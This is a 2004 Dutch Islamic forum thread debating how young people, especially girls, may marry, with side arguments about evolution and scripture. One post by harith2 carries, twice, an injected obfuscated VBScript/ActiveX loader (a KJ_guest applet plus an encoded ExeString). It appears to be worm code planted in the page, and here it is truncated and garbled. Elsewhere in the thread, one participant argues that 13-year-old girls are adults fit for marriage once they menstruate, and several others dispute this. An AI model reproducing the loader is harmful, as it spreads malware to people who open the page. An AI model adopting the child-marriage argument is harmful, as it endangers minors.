Islaam.nl

Islaam.nl Forum

  FAQ FAQ  Doorzoek dit Forum   Kalender   Registreren Registreren  Inloggen Inloggen

Te vroeg trouwen

 Post Reply Post Reply Pagina  <123>
Schrijver
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Plaatsingsopties Plaatsingsopties   Quote harith2 Quote  Post ReplyReageer Directe link naar dit bericht Onderwerp: Te vroeg trouwen
    Geplaatst op: 12 januari 2004 om 18:27

salaam'aleikum

KIMMIE SCHREEF:

Een analoog voorbeeld: het Evangelie is 2 maal herschreven door moslims, omdat in het evangelie niet naar Mohammed wordt verwezen.  Haalt dat dan ook de ganse Islam onderuit, omdat enkele personen een fout hebben begaan?

 

Moet ik nu lachen of huilen????????????

Maar het verwondert me niet van iemand die nog in de evolutie-

theorie gelooft (jou geloof is groots, want jij gelooft in iets zonder

bewijzen, wij zelfs niet)

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Plaatsingsopties Plaatsingsopties   Quote islam Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 18:35

Hello,

je mag van mij lachen of huilen  En die 'nog in de evolutie-theorie geloven' zou ik maar weglaten, er geloven nl heel wat mensen in evolutie, met bewijzen en al...  Ik persoonlijk kende voor deze site maar ��n persoon die er niet in geloofde... 

Over dat van die evangelies, ik heb het zelf niet verzonnen, maar het komt van een site af waarnaar ik vandaag al enkele keren heb verwezen, omdat ze heel wat goede artikelen hebben met referenties enz (ga gerust s kijken www.answering-islam.org).  Zolang we ons allemaal maar goed voelen bij onze eigen denkbeelden en gelukkig zijn he...

Groetjes Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Plaatsingsopties Plaatsingsopties   Quote harith2 Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 18:42

salaam'aleikum

dus je hebt het ZELF niet verzonnen

 

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Plaatsingsopties Plaatsingsopties   Quote islam Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:01

Hello,

nee daar let ik wel voor op  Als je iets beweert, moet je het ook kunnen staven he, met referenties enz...  E�n van de grondslagen van de wetenschap is dat ze zelfkritisch is.  Wat ik moeilijk van jou kan zeggen...

Greetz Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Plaatsingsopties Plaatsingsopties   Quote harith2 Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 18:15

salaam'aleikum

Leg me dan maar eens uit hoe de moslims GRIEKSE teksten

vervalst hebben die OUDER zijn dan de islam??????

< => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\ < => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\
Terug naar boven
Leyla Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 29 augustus 2003
Locatie: Netherlands
Online status: Offline
Berichten: 302
Plaatsingsopties Plaatsingsopties   Quote Leyla Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 17 januari 2004 om 21:27
In eerste instantie geplaatst door mashallah

salaam alaikom,

ik wilde graag weten hoe jullie denken over trouwen op een vroege leeftijd bv 16 jaar ik weet wel dat je vroeg hoort te trouwen maar je moet er wel aan toe zijn en met vroeg weet ik dat je niet op je 30 je hoofd gaat krabben en denken ',oh ja trouwen ik heb al alle vrouwen of mannen gehad maar nu moet ik er echt eentje hebben waarmee ik een leven kan opbouwen''

Zelf vind ik 16 te jong vooral als je je school niet afhebt geen geld hebt enz. Een mooie en goede leeftijd vind ik zelf 20 jaar en ouder.

A Selaam oe Ale'ykoem,

Om terug te komen op het onderwerp waar deze topic mee begon, het volgende:

Trouwen is verplicht voor iedereen die daartoe in staat is, wiens ziel ernaar verlangt en vreest om overspel te plegen. Als zijn ziel verlangt naar het huwelijk, maar de financi�le verantwoordelijkheden van het huwelijk niet kan dragen, diegene moet handelen overeenkomstig wat Allah (swt) heeft gezegd:

"En laat degenen die geen mogelijkheid vinden tot het huwelijk kuis blijven, tot Allah hen uit Zijn gunst voorziet". (Soerat An-Noer 24:33)

En wat de Profeet (vzmh) heeft gezegd:

"O jullie jongeren, wie van jullie in staat is om te trouwen (vooral fysiek, maar ook financieel), laat hij dit dan doen. Want (het aangaan van een huwelijk) het vergemakkelijkt het neerslaan van de ogen en het bewaren van de kuisheid. En wie hiertoe in staat is, laat hij dan vasten, want dat breekt voor hem de behoefte". (Overgeleverd door Al-Boechaari en Moslim).

De Islam moedigt dus zeker aan om te trouwen, omdat dit baten heeft voor zowel het individu als voor de gemeenschap. Echter, degene die trouwt, moet de verantwoordelijkheid kunnen dragen (zowel fysiek als financi�el). En naar mijn mening, kan een "kind" van 13 jaar (zoals Oem Moejahid over haar zusje vertelde) die verantwoordelijkheid niet aan.

Wa Ale'ykoem a Selaam.

The Believers In Their Mutual Friendship, Mercy & Afflection Are Like One Body: If Any Part Of It Complains, The Rest Of The Body Will Also Stay Awake In Pain.
Terug naar boven
Yahyah Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 10 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 9
Plaatsingsopties Plaatsingsopties   Quote Yahyah Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 17 januari 2004 om 23:54

Essalaama wa'aleikom zuster fie dien (Miss) Laila,

Wetenschappelijk bewezen dat we van Apen afstammen door wie is dat bewezen??

Lees niet niet te veel boeken waarin dit soort onzin staat maar ga voor de zekerheid en de Quran is de ZEKERHEID al 1400 jaar!!!!!!

Vroeger kreeg ik op de basisschool ook weleens dit soort verhalen te horen.

Zuster laat niemand je voorliegen.De waarheid hierover vind je terug in de Quran el Kariem en het staat er al 1400 jaar en hierbij nodig ik je uit om de Quran als leidraad te nemen en geloof niet in alles wat de mensheid zegt alleen geloven van de Goddelijkheid zegt als er bronnen zijn dan mag je aannemen dat het wel goed zit maar niet 100% zoals je weet klopt de Quran en de Soenna  dus haal daar maar je bronnen vandaan, dus laat je inlichten door de mensen met de juiste kennis. Lah ie ziedna 'ilmen, Moge Allah swt ons de kennis opdoen die nodig is op weg naar de Jennaat el Firdaus insa allah.

Wij zijn allemaal nakomelingen van Adam vzmh hij was de eerste mens op aarde en Allah schiep Adam uit leem, maar blies hem van Zijn geest in.

Lees hieronder!!!

 Voorzeker, het geval van Jezus is bij Allah hetzelfde als dat van Adam. Hij (Allah) schiep hem uit stof en zeide: "Wees" en hij werd. (bron soerah Ali 'imran:59)

Wij schiepen u, daarna vormden Wij u; toen zeiden Wij tot de engelen: "Onderwerpt u aan Adam en zij onderwierpen zich, behalve Iblies; hij behoorde niet tot degenen die zich onderwierpen.(bron soerah Al A'raf:11)

 O kinderen van Adam! Wij hebben u inderdaad kleding nedergezonden om uw naaktheid te bedekken, ook om sierlijk te zijn, doch het kleed van godsvrucht is het beste. Dit is een teken van Allah, opdat zij er lering uit mogen trekken.
(bron Soerah Al A'raf:26)

En toen uw Heer van Adam's kinderen een nageslacht uit hun lendenen voortbracht, en hen deed getuigen over henzelf: "Ben ik uw Heer niet?" antwoordden zij: "Ja, wij getuigen" zodat gij op de Dag der Opstanding niet zoudt zeggen: "Wij waren ons hiervan zeker niet bewust." (bron Soerah Al A'raf:172)

"Gelastte Ik u niet, o gij kinderen van Adam, dat gij Satan niet zoudt dienen, daar hij een openlijke vijand van u is. (bron Soerah Ya sin:60)

Allah schiep u uit stof dan uit een levenskiem daarna maakt Hij u tot paren. En geen vrouw wordt zwanger of brengt voort, zonder dat Hij het weet. En niemand zijn leven wordt verkort of verlengd zonder dat het n het Boek is vermeld vooreker dit is gemakkelijk voor Allah. (bron Fathir :11)

 

 

 

 


Allah schiep Adam uit leem maar blies hem van Zijn geest in. Hij stond zelfs boven de engelen, want �Allah leerde hem de namen� en gaf hem daarmee een macht die aan de engelen was onthouden. Ibl�s bracht hem ten val en hij moest het paradijs verlaten als een rampzalige: hij was hongerig en naakt, ook was hij dorstig en door de zon gekweld. Dankzij Allah�s verbond krijgt de mens nog een kans om zich ditmaal wel aan de leiding van Allah toe te vertrouwen en om na het oordeel opnieuw het paradijs te betreden.

 


Essalaama wa'aleikom warahmatoelahie ta'ala wa barakatoehoe broeders en zusters

 

O, groep djin en mensen; als gij de grenzen der hemelen en der aarde wilt overschrijden, probeert dit dan. Doch gij zult dit zonder gezag stellig niet kunnen doen. Welke gunsten van uw Heer wilt gij dan ontkennen. Sadaka ellah oel 'adiem

 

Terug naar boven
Oum Mujahid Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 30 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 117
Plaatsingsopties Plaatsingsopties   Quote Oum Mujahid Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 12:35
In eerste instantie geplaatst door marhaba

ok ik ga akkoord dat een meisje zo vlug mogelijk moet trouwen. Dus ik vind dat het pas mogelijk is vanaf 18 jaar. Denk aub realistisch hoe kan een meisje van 13 dat verantwoordelijkheid nemen? Das waar dat het bewezen is dat meisje van vroeger , vroeger rijper werden dan nu. Er is ook verschil tussen warme plaatsen en koude plaatsen. De meisjes van Afrika worden vroeger rijp dan de meisjes van Ciberie, om een voorbeeld te geven. Dus of je gelooft of nie in de wetenschap das uw probleem. Dus een mens is slim genoeg om zelf te besluiten wat ze gaat geloven van de wetenschap en wat niet.

 

Zou je willen dat uw dochter of zoon op 13-jarige leeftijd trouwt? Das kindermishandeling!!!!!!!!!!!!!!!!!!!!!!!Aangezien de fysiologische veranderingen bij de mens gebeurt zijn en trouwens islam is een actuele geloof waarin wetenschap een belangrijke plaats heeft.


As-Salaamu 'Alaykoum,

zuster jij hebt jou mening, en ik heb mijn mening, we moeten elkaar respecteren, jij basseert je op wetenschap, en ik basseer mij op Quran en Sunnah dat is een ezenlijk verschil.. En een kwestie van prioriteiten..

Wallahu A3lam, Moge ALLAH je Jannah Al-Firdaus schenken!
Oehiboeki Fillah,

Wassalaamu 'Alaykoum,
Oum Mujahid
Terug naar boven
Oum Mujahid Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 30 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 117
Plaatsingsopties Plaatsingsopties   Quote Oum Mujahid Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 12:44
In eerste instantie geplaatst door Leyla

In eerste instantie geplaatst door mashallah

salaam alaikom,

ik wilde graag weten hoe jullie denken over trouwen op een vroege leeftijd bv 16 jaar ik weet wel dat je vroeg hoort te trouwen maar je moet er wel aan toe zijn en met vroeg weet ik dat je niet op je 30 je hoofd gaat krabben en denken ',oh ja trouwen ik heb al alle vrouwen of mannen gehad maar nu moet ik er echt eentje hebben waarmee ik een leven kan opbouwen''

Zelf vind ik 16 te jong vooral als je je school niet afhebt geen geld hebt enz. Een mooie en goede leeftijd vind ik zelf 20 jaar en ouder.

A Selaam oe Ale'ykoem,

Om terug te komen op het onderwerp waar deze topic mee begon, het volgende:

Trouwen is verplicht voor iedereen die daartoe in staat is, wiens ziel ernaar verlangt en vreest om overspel te plegen. Als zijn ziel verlangt naar het huwelijk, maar de financi�le verantwoordelijkheden van het huwelijk niet kan dragen, diegene moet handelen overeenkomstig wat Allah (swt) heeft gezegd:

"En laat degenen die geen mogelijkheid vinden tot het huwelijk kuis blijven, tot Allah hen uit Zijn gunst voorziet". (Soerat An-Noer 24:33)

En wat de Profeet (vzmh) heeft gezegd:

"O jullie jongeren, wie van jullie in staat is om te trouwen (vooral fysiek, maar ook financieel), laat hij dit dan doen. Want (het aangaan van een huwelijk) het vergemakkelijkt het neerslaan van de ogen en het bewaren van de kuisheid. En wie hiertoe in staat is, laat hij dan vasten, want dat breekt voor hem de behoefte". (Overgeleverd door Al-Boechaari en Moslim).

De Islam moedigt dus zeker aan om te trouwen, omdat dit baten heeft voor zowel het individu als voor de gemeenschap. Echter, degene die trouwt, moet de verantwoordelijkheid kunnen dragen (zowel fysiek als financi�el). En naar mijn mening, kan een "kind" van 13 jaar (zoals Oem Moejahid over haar zusje vertelde) die verantwoordelijkheid niet aan.

Wa Ale'ykoem a Selaam.



Kijk zuster de essentiele fout die iedereen hier maakt, is om iemand van 13 een kind te noemen, terwijl ALLAAH EN ZIJN BOODSCHAPPER hebben gezegd, dat wanneer iemand zijn Boeken krijgt (ja3nie voor een vrouw als ze ongesteld wordt, of schaamhaar en okselhaar begint te krijgen, en vormen in haar lichaam) dan is ze VOLWASSEN... Dus aghawaath HOE kunnen jullie ALLAH EN ZIJN BOODSCHAPPER tegenspreken door te zeggen je bent volwassen als je 18 JAAR EN OUDER BENT...
SOEBHANALLAAAAAAAAAH
... Moge ALLAH ons allen vergeven..

Verder leg eens uit dat in 25 staten Amerika de huwelijksgerechtheid  bij de leeftijs van 14 begint?????

Ik geef jullie 1 nasee7a uit het diepste van mijn hart..

Verkies niet de definities van de Kufaar boven die van Onze Schepper, en Zijn Dienaar en Boodschapper...

Wallahi dat is fout.. We moeten niet beredener vanuit onze eigen nafs, want onze nafs neigt naar het slecht... Zo heeft ALLAH Ibn Adam (de nakomelingen van Adam (alaihi salaam)) zwak gecreeerd..

Ik hoop dat niemand van jullie dit als een aanval ziet, ik probeer alleen duidelijkheid te brengen...

Wassalaamu 'Alaikoum,
Oum Mujahid
Terug naar boven
Leyla Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 29 augustus 2003
Locatie: Netherlands
Online status: Offline
Berichten: 302
Plaatsingsopties Plaatsingsopties   Quote Leyla Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 14:00

A Selam oe Ale'ykoem Oem Mujahid,

Ik heb nooit beweerd/gezegd/gesuggereerd dat iemand pas op zijn 18e volwassen is. Echter, MIJN mening is, dat een "kind" (ik heb mijn voorgaande bericht dit woord ook express tussen aanhalingstekens gezet), van 13 jaar, de financi�le verantwoordelijkheden van een huwelijk gewoonweg niet aan kan. Zolang iemand die verantwoordelijkheid niet dragen kan (en dat verschilt uiteraard per persoon), kan men beter wachten met het aangaan van een huwelijk.

Nogmaals, dit is mijn mening en mijn interpretatie, baserend op de tekst van de Qora'an en de Sunna van de Profeet (vzmh).

Wa Ale'ykoem a Selaam


The Believers In Their Mutual Friendship, Mercy & Afflection Are Like One Body: If Any Part Of It Complains, The Rest Of The Body Will Also Stay Awake In Pain.
Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 14:42

salaam ou aleykoum oum moujahid :)

islaam moedigt wetenschap en wetenschappers aan, zolang dat het de grenzen van het geloof niet overschrijdt(houdoud oullaah), dus dat ge ni meer bewust wordt dat  god onze schepper is ,en mouhamed onze profeet is,  en dat de islaam het ware geloof is ....als je koran bestudeert ,dan realiseer je dat wetenschap idd een grote/belangrijke plaats heeft(vb:bloedklonter,planeten, wisseling van dag en nacht,..............)

fysiologie+anatomie van de mens=wetenschap,we kunnen ni ontkennen dat er verranderingen in de structuur van de mens plaats hebben gevonden, vb:als je ooit de voetspoor van de profeet sws hebt gezien, hoe groot dat die is.......

en ook, je kunt da verschil nu ng ook zien, als je vglt de meisjes van warme lande,met die van europa,is er dus ook een verschil in rijpheid,etc,etc,etc...

trouwens gelijk wat ik daarboven ook dus zei,islam is actueel, neem vb bij polygamie,een van de redenen hiervan is dat er vroeger  veel oorlogen waren,

mannen tekort,vrouwen bleven er achter met kinderen, dus god de genadevol heeft polygamie toegestaan, met ntrlk de regels en instructies die daarbij horen,

dus aangezien die veranderingen die bij de vrouw die  gebeurd zijn,en ook gelijk wat juff leyla zei, over financ....ik vind 13jaar te jong om de verantwoordlijkheid van trouwen aan te kunnen

+waarom denk je dat er in veel islamitische landentegenwoordig  het huwelijk pas toegestaan is vanaf 18 j.(na idjmaa3 van oulama)

+allah heeft  vr het trouwen een zeer zeer zeer belangrijke  waarde gegeven,dus de partners moeten hiervan zeer bewust zijn.

de profeetsws heeft gezegd"het huwelijk is de helft van de islam"

moge allah ons alle vergeven

wallahou a3lam

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
Oum Mujahid Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 30 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 117
Plaatsingsopties Plaatsingsopties   Quote Oum Mujahid Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 15:10
In eerste instantie geplaatst door Leyla

A Selam oe Ale'ykoem Oem Mujahid,

Ik heb nooit beweerd/gezegd/gesuggereerd dat iemand pas op zijn 18e volwassen is. Echter, MIJN mening is, dat een "kind" (ik heb mijn voorgaande bericht dit woord ook express tussen aanhalingstekens gezet), van 13 jaar, de financi�le verantwoordelijkheden van een huwelijk gewoonweg niet aan kan. Zolang iemand die verantwoordelijkheid niet dragen kan (en dat verschilt uiteraard per persoon), kan men beter wachten met het aangaan van een huwelijk.

Nogmaals, dit is mijn mening en mijn interpretatie, baserend op de tekst van de Qora'an en de Sunna van de Profeet (vzmh).

Wa Ale'ykoem a Selaam




Okay zuster dan is dat verduidelijkd, mijn excuus dat ik dat verkeerd begrepen had, maar dan nog zeg je iets heel verkeerds want je blijft een 13-jarige "een kind" noemen terwijl de leeftijd van menstruatie tegenwoordig 10/11 jaar is... Dat betekend dus dat een 13-jaarige gemiddeld al ongeveer 2 a 3 jaar volwassen is.. Dus dat Blijft een fout, tevens zeg je 'MIJN INTERPREATIE", itaqqillaah zuster, wie zijn wij omzelf zomaar de Quran te gaan interpreteren of de sunnaah, of een 'interpretatie op basis daarvan...
Laat dat aan de Profeet over en de sahaba's en de 'ulemaa... SubhanALLAH dat is precies wat ik bedoelde met het volgen van je eigen nafs... Dat doen wij allemaal tegenwoordig.. We moeten vergiffenis hiervoor vragen.. Moge ALLAH mij vergeven, en jullie ook.. Ameen

Wallahu A3lam oegt...
Terug naar boven
Oum Mujahid Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 30 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 117
Plaatsingsopties Plaatsingsopties   Quote Oum Mujahid Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 15:16
In eerste instantie geplaatst door marhaba

salaam ou aleykoum oum moujahid :)

islaam moedigt wetenschap en wetenschappers aan, zolang dat het de grenzen van het geloof niet overschrijdt(houdoud oullaah), dus dat ge ni meer bewust wordt dat  god onze schepper is ,en mouhamed onze profeet is,  en dat de islaam het ware geloof is ....als je koran bestudeert ,dan realiseer je dat wetenschap idd een grote/belangrijke plaats heeft(vb:bloedklonter,planeten, wisseling van dag en nacht,..............)

fysiologie+anatomie van de mens=wetenschap,we kunnen ni ontkennen dat er verranderingen in de structuur van de mens plaats hebben gevonden, vb:als je ooit de voetspoor van de profeet sws hebt gezien, hoe groot dat die is.......

en ook, je kunt da verschil nu ng ook zien, als je vglt de meisjes van warme lande,met die van europa,is er dus ook een verschil in rijpheid,etc,etc,etc...

trouwens gelijk wat ik daarboven ook dus zei,islam is actueel, neem vb bij polygamie,een van de redenen hiervan is dat er vroeger  veel oorlogen waren,

mannen tekort,vrouwen bleven er achter met kinderen, dus god de genadevol heeft polygamie toegestaan, met ntrlk de regels en instructies die daarbij horen,

dus aangezien die veranderingen die bij de vrouw die  gebeurd zijn,en ook gelijk wat juff leyla zei, over financ....ik vind 13jaar te jong om de verantwoordlijkheid van trouwen aan te kunnen

+waarom denk je dat er in veel islamitische landentegenwoordig  het huwelijk pas toegestaan is vanaf 18 j.(na idjmaa3 van oulama)

+allah heeft  vr het trouwen een zeer zeer zeer belangrijke  waarde gegeven,dus de partners moeten hiervan zeer bewust zijn.

de profeetsws heeft gezegd"het huwelijk is de helft van de islam"

moge allah ons alle vergeven

wallahou a3lam



Zuster je haalt 2 dingen door elkaar, de wetenschap die jij zegt te geloven bij 'te vroeg trouwen, is in tegenstrijd met de Islam, dus overschrijd de hoedoed ALLAH..
Namelijk de volwassenheidsgrens..

Tevens bestaan er geen islamitische landen. dus dat ze die "wet" hebben aangenomen is het imiteren van de kuffaar, en 'IDJMAA VAN 'ULEMAA?" SubhanALLAH oegt, dan weet ik niet wie die 'ulemaa zijn die je volgt? of je sluit hele grote 'ulemaa buiten.. Wallahu A3lam, het is hier geen kwestie van ik heb gelijk of jij hebt gelijk zuster.. Ik probeer echt niet mijn gelijk te krijgen of dergelijke.. Maar het is mijn plicht als moslim zijnde om de leugen van de waarheid te ontmaskeren.. (niet dat ik bedoel dat je liegt, dat zou ik niet durven lieve sis ;) )

Zoals ik eerder posste.. wij zijn nakomelingen van Adam, wij zijn alle zwak, en we maken allemaal fouten.. De Ra7ma van ALLAH is dat hij ons hersenen heeft gegeven om in te zien dat we fouten maken en om ons te verbeteren, en Zijn Genade is el7amdulillaah groot..

Wallahu A3lam
Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 18 januari 2004 om 16:56

salaam :)

oum moujahid , ik zeg niet da ik tegen islam ben, je begrijpt de essentie van mn bericht niet echt,en zeker is het gn kwestie van gelijk hebben of niet!! zoals ik steeds zeg,we zijn er om van melkaar teleren, en om iets te leren , moet er geduld aanwezig zijn.

ok,wie zegt dat er gn islamitiesch lande zijn?komaan he! mss ni 100% , maar toch,zij doen hun best, dus je moet dat toch ni *0 vrmenigvuldigen(if you see what i mean!) er is een islamitische doustour,awel, die doustour is zorgvuldig gemaakt,mss ni door idjmaa3 van bekkende oulama , maar zij zijn moukaladoun ila yawmi diin, daarom moeten wedie landen toch niet als koefaar zien

ik zou zeggen, allahou a3lamou mini wa minki

llah ywafakna fi tariki lkhayr ,

ps: nog eens wetenschap is een element van islam. prfeet sws : "outloubou l3ilma walaw fi ssin" (das maar een piep kleine vbje vr de waarde van wet. in islaam)

wassalaam

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
Leyla Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 29 augustus 2003
Locatie: Netherlands
Online status: Offline
Berichten: 302
Plaatsingsopties Plaatsingsopties   Quote Leyla Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 20 januari 2004 om 00:04
In eerste instantie geplaatst door Oum Mujahid

In eerste instantie geplaatst door Leyla

A Selam oe Ale'ykoem Oem Mujahid,

Ik heb nooit beweerd/gezegd/gesuggereerd dat iemand pas op zijn 18e volwassen is. Echter, MIJN mening is, dat een "kind" (ik heb mijn voorgaande bericht dit woord ook express tussen aanhalingstekens gezet), van 13 jaar, de financi�le verantwoordelijkheden van een huwelijk gewoonweg niet aan kan. Zolang iemand die verantwoordelijkheid niet dragen kan (en dat verschilt uiteraard per persoon), kan men beter wachten met het aangaan van een huwelijk.

Nogmaals, dit is mijn mening en mijn interpretatie, baserend op de tekst van de Qora'an en de Sunna van de Profeet (vzmh).

Wa Ale'ykoem a Selaam




Okay zuster dan is dat verduidelijkd, mijn excuus dat ik dat verkeerd begrepen had, maar dan nog zeg je iets heel verkeerds want je blijft een 13-jarige "een kind" noemen terwijl de leeftijd van menstruatie tegenwoordig 10/11 jaar is... Dat betekend dus dat een 13-jaarige gemiddeld al ongeveer 2 a 3 jaar volwassen is.. Dus dat Blijft een fout, tevens zeg je 'MIJN INTERPREATIE", itaqqillaah zuster, wie zijn wij omzelf zomaar de Quran te gaan interpreteren of de sunnaah, of een 'interpretatie op basis daarvan...
Laat dat aan de Profeet over en de sahaba's en de 'ulemaa... SubhanALLAH dat is precies wat ik bedoelde met het volgen van je eigen nafs... Dat doen wij allemaal tegenwoordig.. We moeten vergiffenis hiervoor vragen.. Moge ALLAH mij vergeven, en jullie ook.. Ameen

Wallahu A3lam oegt...

A Selam oe Ale'ykoem Oum Moujahid,

Blijkbaar hebben we beiden een andere opvatting jegens het wel/niet te vroeg trouwen. Ik begrijp je volkomen en zeg ook niet dat je ongelijk hebt. Echter, ik blijf bij mijn standpunt dat ik een persoon (kind, of hoe men het ook noemen wil) van 13 jaar niet de financi�le verantwoordelijkheid van een huwelijk zie dragen. Naast het financi�le is er ook een emotionele en fysieke verantwoordelijkheid, die men niet moet onderschatten.

Zoals de Sunna van de profeet (vzmh) die ik aangehaald heb, is het voor een persoon, die deze verantwoordelijkheden niet dragen kan, het beste om te wachten met een huwelijk. Een huwelijk is geen spelletje, waar we weer gemakkelijk uit kunnen stappen. Het is als het ware een stap voor het leven, insha'Allah (daar gaan we dan vanuit). Echter, persoonlijkheden verschillen en er zullen heus wel jonge meiden zijn die deze verantwoordelijkheden kunnen dragen..maar dat zijn naar mijn mening eerder uitzonderingen.

Wa Ale'ykoem a Selaam

The Believers In Their Mutual Friendship, Mercy & Afflection Are Like One Body: If Any Part Of It Complains, The Rest Of The Body Will Also Stay Awake In Pain.
Terug naar boven
MasterB Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 13 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 233
Plaatsingsopties Plaatsingsopties   Quote MasterB Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 20 januari 2004 om 00:11

Trouwen is inderdaad een levenskwestie. Ik vind de leeftijd vanaf volwassenheid niet meer belangrijk. Voor het achtiende levensjaar moet men er wel heel voorzichtig mee zijn. 21 zou ik in principe een betere leeftijd vinden, want de 'gekke gedragingen' van de puberteit zijn dan weg.

Voor harith,

Seksueel volwassen zijn houdt niet alleen het lichamelijke in. Seksueel volwassen in de mentale kwestie is minstens zo belangrijk.

Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 20 januari 2004 om 10:20

salaam

awel,ja, ik vind het ook

wassalaam

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
Umm Umarah Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 oktober 2003
Locatie: Netherlands
Online status: Offline
Berichten: 704
Plaatsingsopties Plaatsingsopties   Quote Umm Umarah Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 20 januari 2004 om 11:38

 

Asalaam wa alaikoum wrb...

Ik ben het eens met zuster leyla...please mensen...een meisje van 13 jaar is naar mijn mening echt niet klaar voor een huwelijk.....20 jaar is een goede leeftijd voor een meisje om over het huwelijk na te denken....vanaf 20 jaar en niet jonger...

Oualaikoum asalaam...

Beschrijving van het paradijs! http://www.freewebs.com/islamiway/beschrijving.htm
Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 20 januari 2004 om 15:36

salaam

trouwens mss kan financie niet  "het pb"zijn,maar een kind van 13 jaar is en blijft een kind!! is ni bewust van de groote verantwoodlijkheid van een huwelijk.

wassalaam

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
moslima_14 Bekijk dropdown
Newbie
Newbie
Avatar

